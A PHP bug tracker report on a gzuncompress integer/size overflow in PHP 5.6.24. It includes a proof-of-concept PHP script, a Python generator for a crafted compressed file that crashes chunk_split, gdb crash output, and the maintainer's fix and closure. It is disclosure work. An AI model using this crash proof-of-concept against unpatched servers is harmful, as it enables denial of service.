php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #72883 gzuncompress does NOT check output string size which leads to an overflow
Submitted: 2016-08-18 16:25 UTC Modified: 2017-02-13 01:30 UTC
From: nguyenluan dot vnn at gmail dot com Assigned: stas (profile)
Status: Closed Package: Zlib related
PHP Version: 5.6.24 OS:
Private report: No CVE-ID: None
View Add Comment Developer Edit
Welcome! If you don't have a Git account, you can't do anything here.
You can add a comment by following this link or if you reported this bug, you can edit this bug over here.
(description)
Block user comment
Status: Assign to:
Package:
Bug Type:
Summary:
From: nguyenluan dot vnn at gmail dot com
New email:
PHP Version: OS:

 

 [2016-08-18 16:25 UTC] nguyenluan dot vnn at gmail dot com
Description:
------------
gzuncompress function does NOT check for the output string size so attacker could create a string larger than 2GB, this is an overflow since PHP string couldn't be larger than this size.

The output string could then be fed into other function to cause a crash.

Test script:
---------------
<?php
    ini_set('memory_limit', -1);

    $gzstr = file_get_contents("../1.gz");
    var_dump(strlen($gzstr));
    $str = gzuncompress($gzstr);
    var_dump(strlen($str));

    chunk_split($str, 20, $str);
?>

1.gz is created from this python script (please run it with python 3)

import zlib
f = open('1.gz', 'wb')
s = 'a'*0x8000ffff
s = s.encode('utf-8')
data = zlib.compress(s)
f.write(data)
f.close()

Expected result:
----------------
No crash

Actual result:
--------------
Starting program: /home/user/Desktop/php-5.6.24/sapi/cli/php ../test.php
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
int(2087332)
int(-2147418113)

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0xfffffffffffdffa9 
RBX: 0x8afb0f (<execute_ex>:	push   rbp)
RCX: 0xffffffff0001fffe 
RDX: 0xffffffff8000ffff 
RSI: 0x7fff3d94c070 ('a' <repeats 200 times>...)
RDI: 0x7fffbd95c0c8 ('a' <repeats 16 times>)
RBP: 0x7fffffffa5d0 --> 0x7fffffffa640 --> 0x7fffffffa680 --> 0x7fffffffa6b0 --> 0x7fffffffa6e0 --> 0x7fffffffa840 --> 0x7fffffffcab0 --> 0x7fffffffddf0 --> 0x7fffffffdf50 --> 0x0 
RSP: 0x7fffffffa528 --> 0x7715fc (<zif_chunk_split+290>:	mov    eax,DWORD PTR [rbp-0x6c])
RIP: 0x7ffff675ceee (<__memcpy_sse2_unaligned+46>:	)
R8 : 0x0 
R9 : 0x0 
R10: 0x7fffffffa260 --> 0x0 
R11: 0x7ffff684b390 --> 0xfffda7a0fffda4cf 
R12: 0x4228a0 (<_start>:	xor    ebp,ebp)
R13: 0x7fffffffe030 --> 0x2 
R14: 0x0 
R15: 0x0
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x7ffff675cee0 <__memcpy_sse2_unaligned+32>:	movdqu xmm8,XMMWORD PTR [rsi]
   0x7ffff675cee5 <__memcpy_sse2_unaligned+37>:	cmp    rdx,0x20
   0x7ffff675cee9 <__memcpy_sse2_unaligned+41>:	movdqu XMMWORD PTR [rdi],xmm8
=> 0x7ffff675ceee <__memcpy_sse2_unaligned+46>:	
    movdqu xmm8,XMMWORD PTR [rsi+rdx*1-0x10]
   0x7ffff675cef5 <__memcpy_sse2_unaligned+53>:	
    movdqu XMMWORD PTR [rdi+rdx*1-0x10],xmm8
   0x7ffff675cefc <__memcpy_sse2_unaligned+60>:	
    ja     0x7ffff675cf10 <__memcpy_sse2_unaligned+80>
   0x7ffff675cefe <__memcpy_sse2_unaligned+62>:	mov    rax,rdi
   0x7ffff675cf01 <__memcpy_sse2_unaligned+65>:	ret
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffa528 --> 0x7715fc (<zif_chunk_split+290>:	mov    eax,DWORD PTR [rbp-0x6c])
0008| 0x7fffffffa530 --> 0x7fffffffa564 --> 0x1fffe8000ffff 
0016| 0x7fffffffa538 --> 0x83105c (<_efree+111>:	leave)
0024| 0x7fffffffa540 --> 0x0 
0032| 0x7fffffffa548 --> 0x7ffff7f7e1e8 --> 0x7ffff1a96a70 ('Z' <repeats 16 times>, "\001")
0040| 0x7fffffffa550 --> 0x7ffff1a96a70 ('Z' <repeats 16 times>, "\001")
0048| 0x7fffffffa558 --> 0x300000000 
0056| 0x7fffffffa560 --> 0x8000ffff00000000 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
__memcpy_sse2_unaligned ()
    at ../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S:36
36	../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S: No such file or directory.
gdb-peda$ bt
#0  __memcpy_sse2_unaligned ()
    at ../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S:36
#1  0x00000000007715fc in zif_chunk_split (ht=0x3, 
    return_value=0x7ffff1a96a70, return_value_ptr=0x7ffff7f7e1e8, 
    this_ptr=0x0, return_value_used=0x0)
    at /home/user/Desktop/php-5.6.24/ext/standard/string.c:2221
#2  0x00000000008b0500 in zend_do_fcall_common_helper_SPEC (
    execute_data=0x7ffff7f7e320)
    at /home/user/Desktop/php-5.6.24/Zend/zend_vm_execute.h:558
#3  0x00000000008b5de6 in ZEND_DO_FCALL_SPEC_CONST_HANDLER (
    execute_data=0x7ffff7f7e320)
    at /home/user/Desktop/php-5.6.24/Zend/zend_vm_execute.h:2602
#4  0x00000000008afb6f in execute_ex (execute_data=0x7ffff7f7e320)
    at /home/user/Desktop/php-5.6.24/Zend/zend_vm_execute.h:363
#5  0x00000000008afbf8 in zend_execute (op_array=0x7ffff7fb7e78)
    at /home/user/Desktop/php-5.6.24/Zend/zend_vm_execute.h:388
#6  0x000000000086af69 in zend_execute_scripts (type=0x8, retval=0x0, 
    file_count=0x3) at /home/user/Desktop/php-5.6.24/Zend/zend.c:1341
#7  0x00000000007d0ab0 in php_execute_script (primary_file=0x7fffffffcbf0)
    at /home/user/Desktop/php-5.6.24/main/main.c:2613
#8  0x000000000091f33e in do_cli (argc=0x2, argv=0x106c3d0)
    at /home/user/Desktop/php-5.6.24/sapi/cli/php_cli.c:994
#9  0x000000000092066c in main (argc=0x2, argv=0x106c3d0)
    at /home/user/Desktop/php-5.6.24/sapi/cli/php_cli.c:1378
#10 0x00007ffff66e6f45 in __libc_start_main (main=0x91fe54 <main>, argc=0x2, 
    argv=0x7fffffffe038, init=<optimized out>, fini=<optimized out>, 
    rtld_fini=<optimized out>, stack_end=0x7fffffffe028) at libc-start.c:287
#11 0x00000000004228c9 in _start ()


Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2016-09-02 06:23 UTC] stas@php.net
-Assigned To: +Assigned To: stas
 [2016-09-02 06:23 UTC] stas@php.net
The fix is in security repo as 0f1eb74e92191e817b4198ceda4e8f093699da62 and in https://gist.github.com/39b697c75a0502e091a1191f83029034
please verify
 [2016-09-02 16:07 UTC] nguyenluan dot vnn at gmail dot com
The patch is good.
 [2016-09-13 04:13 UTC] stas@php.net
-Status: Assigned +Status: Closed
 [2016-09-13 04:13 UTC] stas@php.net
The fix for this bug has been committed.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at
http://snaps.php.net/.

 For Windows:

http://windows.php.net/snapshots/
 
Thank you for the report, and for helping us make PHP better.


 [2016-09-13 12:35 UTC] nguyenluan dot vnn at gmail dot com
Can you assign a CVE number for this?
 [2017-02-13 01:30 UTC] stas@php.net
-Type: Security +Type: Bug
 
PHP Copyright © 2001-2020 The PHP Group
All rights reserved.
Last updated: Wed Dec 02 05:01:23 2020 UTC